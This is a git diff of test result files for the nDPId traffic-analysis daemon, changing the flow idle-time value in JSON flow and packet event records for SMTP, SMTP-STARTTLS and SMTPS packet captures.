00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"smtp-starttls.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1388017124762} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1388017124762,"flow_last_seen":1388017124762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1388017124762,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1388017124762,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1388017124762,"pkt":"AAAMB6wBABNyxPHhCABFAAA8JqtAAEAGeocKAAABrcJEGuA+ABlXuT72AAAAAKACOQgLsAAAAgQFtAQCCAraWRhdAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1388017124774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1388017124774,"pkt":"ABNyxPHhANAr0XYACABFAAA8X3cAAC4Gk7utwkQaCgAAAQAZ4D6dvxfqV7k+96ASpiw5gwAAAgQFlgQCCAoS8Zx72lkYXQEDAwY="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1388017124774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1388017124774,"pkt":"AAAMB6wBABNyxPHhCABFAAA0JqxAAEAGeo4KAAABrcJEGuA+ABlXuT73nb8X64AQAHMN3wAAAQEICtpZGGgS8Zx7"} -00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1388017124762,"flow_last_seen":1388017124785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1388017124785,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP.Google","breed":"Acceptable","category":"Web"},"smtp": {"user":"","password":""}} -00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":36,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1388017124762,"flow_last_seen":1388017125239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6011,"flow_avg_l4_payload_len":166,"midstream":0,"thread_ts_msec":1388017125239,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP.Google","breed":"Acceptable","category":"Web"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1388017124762,"flow_last_seen":1388017124762,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1388017124762,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1388017124762,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1388017124762,"pkt":"AAAMB6wBABNyxPHhCABFAAA8JqtAAEAGeocKAAABrcJEGuA+ABlXuT72AAAAAKACOQgLsAAAAgQFtAQCCAraWRhdAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1388017124774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1388017124774,"pkt":"ABNyxPHhANAr0XYACABFAAA8X3cAAC4Gk7utwkQaCgAAAQAZ4D6dvxfqV7k+96ASpiw5gwAAAgQFlgQCCAoS8Zx72lkYXQEDAwY="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1388017124774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1388017124774,"pkt":"AAAMB6wBABNyxPHhCABFAAA0JqxAAEAGeo4KAAABrcJEGuA+ABlXuT73nb8X64AQAHMN3wAAAQEICtpZGGgS8Zx7"} +00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1388017124762,"flow_last_seen":1388017124785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1388017124785,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP.Google","breed":"Acceptable","category":"Web"},"smtp": {"user":"","password":""}} +00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":36,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1388017124762,"flow_last_seen":1388017125239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6011,"flow_avg_l4_payload_len":166,"midstream":0,"thread_ts_msec":1388017125239,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP.Google","breed":"Acceptable","category":"Web"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":36,"source":"smtp-starttls.pcap","alias":"nDPId-test","packets-captured":36,"packets-processed":36,"total-skipped-flows":0,"total-l4-data-len":6011,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1388017125239} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 36/36 diff --git a/test/results/smtp.pcap.out b/test/results/smtp.pcap.out index b41935f1b..c5a4af7d0 100644 --- a/test/results/smtp.pcap.out +++ b/test/results/smtp.pcap.out @@ -1,11 +1,11 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"smtp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"smtp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":934028408568} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":934028408568,"flow_last_seen":934028408568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":934028408568,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":934028408568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":934028408568,"pkt":"AMBPo1fbABB7OEYzCABFAAAsEDMAAD8GkhjCB\/iZrBByzwhPABnlqEITAAAAAGACAgCMgQAAAgQFtAAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":934028408569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":934028408569,"pkt":"ABB7OEYzAMBPo1fbCABFAAAsFcQAAEAGi4esEHLPwgf4mQAZCE+jURBm5ahCFGASf+Ba2AAAAgQFtAW0"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":934028408570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":934028408570,"pkt":"AMBPo1fbABB7OEYzCABFAAAoEDRAAD8GUhvCB\/iZrBByzwhPABnlqEIUo1EQZ1AQfXh0\/QAAAAAAAAAA"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":934028408568,"flow_last_seen":934028408647,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":934028408647,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":934028408568,"flow_last_seen":934028408801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":17955,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":934028408801,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":934028408568,"flow_last_seen":934028408568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":934028408568,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":934028408568,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":934028408568,"pkt":"AMBPo1fbABB7OEYzCABFAAAsEDMAAD8GkhjCB\/iZrBByzwhPABnlqEITAAAAAGACAgCMgQAAAgQFtAAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":934028408569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":934028408569,"pkt":"ABB7OEYzAMBPo1fbCABFAAAsFcQAAEAGi4esEHLPwgf4mQAZCE+jURBm5ahCFGASf+Ba2AAAAgQFtAW0"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":934028408570,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":934028408570,"pkt":"AMBPo1fbABB7OEYzCABFAAAoEDRAAD8GUhvCB\/iZrBByzwhPABnlqEIUo1EQZ1AQfXh0\/QAAAAAAAAAA"} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":934028408568,"flow_last_seen":934028408647,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":934028408647,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":934028408568,"flow_last_seen":934028408801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":17955,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":934028408801,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":95,"source":"smtp.pcap","alias":"nDPId-test","packets-captured":95,"packets-processed":95,"total-skipped-flows":0,"total-l4-data-len":17955,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":934028408801} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 95/95 diff --git a/test/results/smtps.pcapng.out b/test/results/smtps.pcapng.out index c167bd140..5dd89248c 100644 --- a/test/results/smtps.pcapng.out +++ b/test/results/smtps.pcapng.out @@ -1,11 +1,11 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"smtps.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"smtps.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614938504972} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614938504972,"flow_last_seen":1614938504972,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614938504972,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614938504972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938504972,"pkt":"AAAAAAAAAAEA\/khbCABFAAA0\/aNAAEAGZc0+KyRjFUFfhJMyAdF0clasAAAAAIACFrAhIQAAAgQFhAEBBAIBAwMC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614938505205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938505205,"pkt":"AAAAAAAAAAEA\/khbCABFAAA0AABAAC4GdXEVQV+EPiskYwHRkzJiRoeidHJWrYASchDbkQAAAgQFtAEBBAIBAwMH"} -01146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614938505342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1614938505342,"pkt":"AAAAAAAAAAEA\/khbCABFAAIt\/aVAAEAGY9I+KyRjFUFfhJMyAdF0clatYkaHo1AYBazqdwAAFgMBAgABAAH8AwO7S\/DbiCyixZpW6cPhrJJZKMPmmGE2v4GGVrqm684TKwAArMAwwCzAKMAkwBTACgClAKMAoQCfAGsAagBpAGgAOQA4ADcANgCIAIcAhgCFwDLALsAqwCbAD8AFAJ0APQA1AITAL8ArwCfAI8ATwAkApACiAKAAngBnAEAAPwA+ADMAMgAxADAAmgCZAJgAlwBFAEQAQwBCwDHALcApwCXADsAEAJwAPAAvAJYAQQAHwBHAB8AMwAIABQAEwBLACAAWABMAEAANwA3AAwAKAP8BAAEnAAsABAMAAQIACgAcABoAFwAZABwAGwAYABoAFgAOAA0ACwAMAAkACgAjAAAADQAgAB4GAQYCBgMFAQUCBQMEAQQCBAMDAQMCAwMCAQICAgMADwABAQAVAM4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1614938504972,"flow_last_seen":1614938505342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1614938505342,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SMTPS","breed":"Safe","category":"Email"}} -00923{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1614938504972,"flow_last_seen":1614938505439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1614938505439,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SMTPS","breed":"Safe","category":"Email"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614938504972,"flow_last_seen":1614938504972,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614938504972,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614938504972,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938504972,"pkt":"AAAAAAAAAAEA\/khbCABFAAA0\/aNAAEAGZc0+KyRjFUFfhJMyAdF0clasAAAAAIACFrAhIQAAAgQFhAEBBAIBAwMC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614938505205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938505205,"pkt":"AAAAAAAAAAEA\/khbCABFAAA0AABAAC4GdXEVQV+EPiskYwHRkzJiRoeidHJWrYASchDbkQAAAgQFtAEBBAIBAwMH"} +01146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614938505342,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1614938505342,"pkt":"AAAAAAAAAAEA\/khbCABFAAIt\/aVAAEAGY9I+KyRjFUFfhJMyAdF0clatYkaHo1AYBazqdwAAFgMBAgABAAH8AwO7S\/DbiCyixZpW6cPhrJJZKMPmmGE2v4GGVrqm684TKwAArMAwwCzAKMAkwBTACgClAKMAoQCfAGsAagBpAGgAOQA4ADcANgCIAIcAhgCFwDLALsAqwCbAD8AFAJ0APQA1AITAL8ArwCfAI8ATwAkApACiAKAAngBnAEAAPwA+ADMAMgAxADAAmgCZAJgAlwBFAEQAQwBCwDHALcApwCXADsAEAJwAPAAvAJYAQQAHwBHAB8AMwAIABQAEwBLACAAWABMAEAANwA3AAwAKAP8BAAEnAAsABAMAAQIACgAcABoAFwAZABwAGwAYABoAFgAOAA0ACwAMAAkACgAjAAAADQAgAB4GAQYCBgMFAQUCBQMEAQQCBAMDAQMCAwMCAQICAgMADwABAQAVAM4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1614938504972,"flow_last_seen":1614938505342,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1614938505342,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SMTPS","breed":"Safe","category":"Email"}} 